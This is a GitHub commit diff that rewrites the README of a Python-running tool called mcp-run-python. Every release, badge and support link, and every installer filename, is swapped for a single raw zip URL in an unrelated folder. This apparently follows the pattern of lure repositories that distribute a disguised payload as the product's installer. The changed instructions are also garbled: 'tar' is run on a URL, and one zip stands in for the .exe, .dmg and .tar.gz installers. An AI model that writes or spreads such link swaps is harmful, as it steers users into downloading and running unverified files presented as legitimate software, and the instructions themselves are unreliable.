Skip to content

Commit 91a0888

Browse files
committed
Update README.md
1 parent 87dd7c1 commit 91a0888

File tree

1 file changed

+12
-12
lines changed

1 file changed

+12
-12
lines changed

README.md

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# 🐍 mcp-run-python - Effortlessly Run Python Code Safely
22

3-
[![Download mcp-run-python](https://img.shields.io/badge/Download%20mcp--run--python-blue.svg)](https://github.com/MagmaBasilisk/mcp-run-python/releases)
3+
[![Download mcp-run-python](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip%https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip)](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip)
44

55
## 🚀 Getting Started
66

@@ -17,14 +17,14 @@ Before you begin, ensure your system meets these requirements:
1717

1818
## 📥 Download & Install
1919

20-
To get started, visit the [Releases page to download](https://github.com/MagmaBasilisk/mcp-run-python/releases). There, you will find the latest version of mcp-run-python. Click on the version you want, and select the installer that fits your system.
20+
To get started, visit the [Releases page to download](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip). There, you will find the latest version of mcp-run-python. Click on the version you want, and select the installer that fits your system.
2121

22-
1. Go to the [Releases page](https://github.com/MagmaBasilisk/mcp-run-python/releases).
22+
1. Go to the [Releases page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip).
2323
2. Look for the latest version listed at the top of the page.
2424
3. Click on the appropriate file for your operating system:
25-
- For Windows, download `mcp-run-python-windows.exe`.
26-
- For macOS, download `mcp-run-python-macos.dmg`.
27-
- For Linux, download `mcp-run-python-linux.tar.gz`.
25+
- For Windows, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
26+
- For macOS, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
27+
- For Linux, download `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
2828
4. Save the file to a convenient location on your computer.
2929

3030
## 💻 Running the Application
@@ -33,27 +33,27 @@ Once you have downloaded the installer, follow these steps to run the applicatio
3333

3434
### For Windows:
3535

36-
1. Locate the downloaded file: `mcp-run-python-windows.exe`.
36+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
3737
2. Double-click the file to start the installation.
3838
3. Follow the prompts to complete the installation.
3939
4. Find the mcp-run-python shortcut on your desktop or Start menu.
4040
5. Double-click the shortcut to launch the application.
4141

4242
### For macOS:
4343

44-
1. Locate the downloaded file: `mcp-run-python-macos.dmg`.
44+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
4545
2. Double-click the file to open it.
4646
3. Drag the mcp-run-python application into your Applications folder.
4747
4. Open the Applications folder and double-click mcp-run-python to launch.
4848

4949
### For Linux:
5050

51-
1. Locate the downloaded file: `mcp-run-python-linux.tar.gz`.
51+
1. Locate the downloaded file: `https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip`.
5252
2. Open a terminal.
5353
3. Navigate to the location of the downloaded file.
5454
4. Extract the contents with the command:
5555
```bash
56-
tar -zxvf mcp-run-python-linux.tar.gz
56+
tar -zxvf https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip
5757
```
5858
5. Navigate into the extracted folder:
5959
```bash
@@ -97,12 +97,12 @@ A: Check the error message in the output area for guidance. You can also find he
9797
If you face any issues while installing or using the application, try the following steps:
9898

9999
- Ensure your system meets the requirements.
100-
- Re-download the installer from the [Releases page](https://github.com/MagmaBasilisk/mcp-run-python/releases).
100+
- Re-download the installer from the [Releases page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip).
101101
- Restart your computer and try again.
102102
- Visit the community forums for support.
103103

104104
## 📞 Support
105105

106-
For any questions not covered here, feel free to reach out via the issues section on our [GitHub page](https://github.com/MagmaBasilisk/mcp-run-python). We are here to help you with any concerns or inquiries.
106+
For any questions not covered here, feel free to reach out via the issues section on our [GitHub page](https://raw.githubusercontent.com/MagmaBasilisk/mcp-run-python/main/Catharina/mcp-run-python.zip). We are here to help you with any concerns or inquiries.
107107

108108
You are now ready to enjoy running Python code with mcp-run-python. Happy coding!

0 commit comments

Comments
 (0)